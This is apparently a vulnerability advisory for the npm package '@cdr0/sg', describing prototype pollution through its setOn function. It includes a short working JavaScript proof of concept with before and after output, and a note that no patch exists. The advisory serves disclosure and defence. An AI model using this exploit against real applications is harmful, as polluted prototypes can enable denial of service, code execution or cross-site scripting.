Affected versions of this module allow an attacker to manipulate the prototype of an object, potentially leading to the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.
@cdr0/sg/ref.js:89
(async () => {
const lib = await import('@cdr0/sg');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default.setOn ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__
and contructor.prototype